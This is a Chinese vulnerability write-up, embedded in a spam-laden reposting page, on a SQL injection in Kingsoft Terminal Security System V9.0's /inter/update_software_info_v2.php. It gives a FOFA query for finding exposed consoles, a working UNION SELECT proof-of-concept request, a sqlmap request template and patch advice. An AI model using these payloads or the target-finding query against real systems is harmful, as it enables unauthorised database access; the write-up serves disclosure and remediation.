当前位置: 首页 > news >正文

网站建设申请总结注册公司做网站

网站建设申请总结,注册公司做网站,贵州省建设厅住房和城乡建设官网二建考试,商城app开发价格表0x01 产品简介 金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。 0x02 漏洞概述 金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该…

0x01 产品简介

     金山终端安全系统是一款为企业提供终端防护的安全产品,针对恶意软件、病毒和外部攻击提供防范措施,帮助维护企业数据和网络。

0x02 漏洞概述

    金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞,该漏洞是由于金山终端安全系统未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。

0x03 影响范围

 金山终端安全系统<V9.SP1.E1008

0x04 复现环境

FOFA:title=="用户登录-金山终端安全系统V9.0Web控制台"

0x05 漏洞复现

PoC

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedtype=-1+UNION+SELECT+1,user(),3,4,5,6,7,8--&key=&pageCount=0&curPage=

查询当前用户

延时注入

Sqlmap验证 

数据包放txt里面

POST /inter/update_software_info_v2.php HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencodedtype=-100*&key=&pageCount=0&curPage=

0x06 修复建议 

升级修复方案

官方已经推出了新版本修复了漏洞。建议所有受影响的用户尽快访问官方网站,更新版本至新版本。https://www.ejinshan.net/lywz/index

临时缓解方案

通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。另外作为安全建议,不要将集权设备的Web管理控制台开放在互联网上,并且仅允许可信IP进行访问。

http://www.yayakq.cn/news/904961/

相关文章:

  • phpcms网站模版网页内容编辑
  • 网站建设中单页面南昌网站推广策划
  • 天猫网站左侧导航是怎么做的万网做网站吗
  • 上海网站建设类岗位wordpress不能视频
  • 芯片公司网站建设关闭WordPress主题自适应
  • 网站套模板什么意思网页界面设计调查问卷
  • 没有工信部备案的网站是骗子吗一般网站后台地址
  • 陕西网站建设方案wordpress 获取表单数据
  • 外国排版网站wordpress 商品展示
  • 专业网站制作设福州seo代理计费
  • 南京cms建站系统wordpress多站点换域名
  • 做哪个网站零售最好营销型网站建设服务
  • 网站服务器速度对seo有什么影响?外贸站seo
  • 长沙网站seo公司互联网服务平台备案单位机动车
  • 我市精神文明建设的门户网站成都网站设计很好
  • 西安市建设和住房保障局网站wordpress免费装修主题
  • 瑞安自适应网站建设seo软文是什么意思
  • 关于网站开发的步骤郑州网站建设的公司
  • 室内设计师网站十大网站深圳专门做写字楼的网站
  • c2c网站建设需求分析wordpress 点击排行
  • 南乐县住房和城乡建设局网站深圳家装互联网网站
  • 网站空间pdf下载不了全栈工程师是做网站吗
  • 淘宝网站开发的意义lnmp和wordpress
  • 17zwd一起做网站泰然建设网站
  • 企业建设门户网站有哪些如何制作自己想要的图片
  • 金属行业网站模板下载冷水江网页定制
  • 关于未备案网站射洪哪里可以做网站
  • 海南网站建设软件渠道网恋
  • 家具电商网站建设建设部注册中心网站
  • 网站建设运营维护啥意思wordpress 图片木马